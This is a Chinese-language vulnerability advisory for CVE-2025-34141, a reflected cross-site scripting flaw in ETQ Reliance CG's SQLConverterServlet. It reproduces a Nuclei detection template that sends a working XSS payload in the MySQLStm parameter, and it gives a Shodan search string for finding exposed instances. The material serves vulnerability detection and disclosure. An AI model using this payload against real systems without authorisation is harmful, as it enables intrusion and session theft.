ETQ Reliance Reflected XSS via SQLConverterServlet

漏洞信息

漏洞名称: ETQ Reliance Reflected XSS via SQLConverterServlet

漏洞编号:

  • CVE: CVE-2025-34141

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: ETQ Reliance CG(旧版)平台中的SQLConverterServlet组件存在一个反射型跨站脚本(XSS)漏洞。此漏洞需要用户交互,例如点击特制链接,可能导致在用户上下文中执行未经授权的脚本。受影响的servlet不必要地暴露给已认证用户,并在SE.2025.1版本中被禁用。

受影响产品: ETQ Reliance CG是一个质量管理软件平台,广泛应用于企业级服务中,用于跟踪和管理质量流程。它通常部署在企业内部网络中,作为关键业务应用的一部分。

漏洞解释: 该漏洞属于反射型跨站脚本(XSS)类型,其技术根源在于SQLConverterServlet组件未对用户输入进行适当的验证和清理,导致恶意脚本可以被注入并执行。攻击者可以通过构造特制的URL,诱使用户点击,从而在用户的浏览器上下文中执行任意JavaScript代码。

影响分析: 此漏洞可能导致攻击者在受害者的浏览器中执行恶意脚本,窃取会话令牌、重定向用户到恶意网站或进行其他恶意操作。由于需要用户交互,攻击的自动化程度较低,但一旦成功利用,可能对受影响组织的安全造成严重影响。漏洞已被标记为需要认证,这意味着攻击者需要先获得有效的用户凭证才能利用此漏洞。

产品厂商: ETQ

产品名称: ETQ Reliance CG (legacy)

影响版本: version < SE.2025.1

搜索语法: html:”ETQ Reliance”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/f2036aac7ae025bfe24a88eca51a570d7a1d385c/http%2Fcves%2F2025%2FCVE-2025-34141.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

id: CVE-2025-34141

info:
  name: ETQ Reliance Reflected XSS via `SQLConverterServlet`
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the `SQLConverterServlet` component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"ETQ Reliance"
  tags: cve,cve2025,etq-reliance,xss

flow: |
  http(1)
  if(template.path){
   http(2)
  } else {
   set("path","reliance")
   http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      - |
        GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and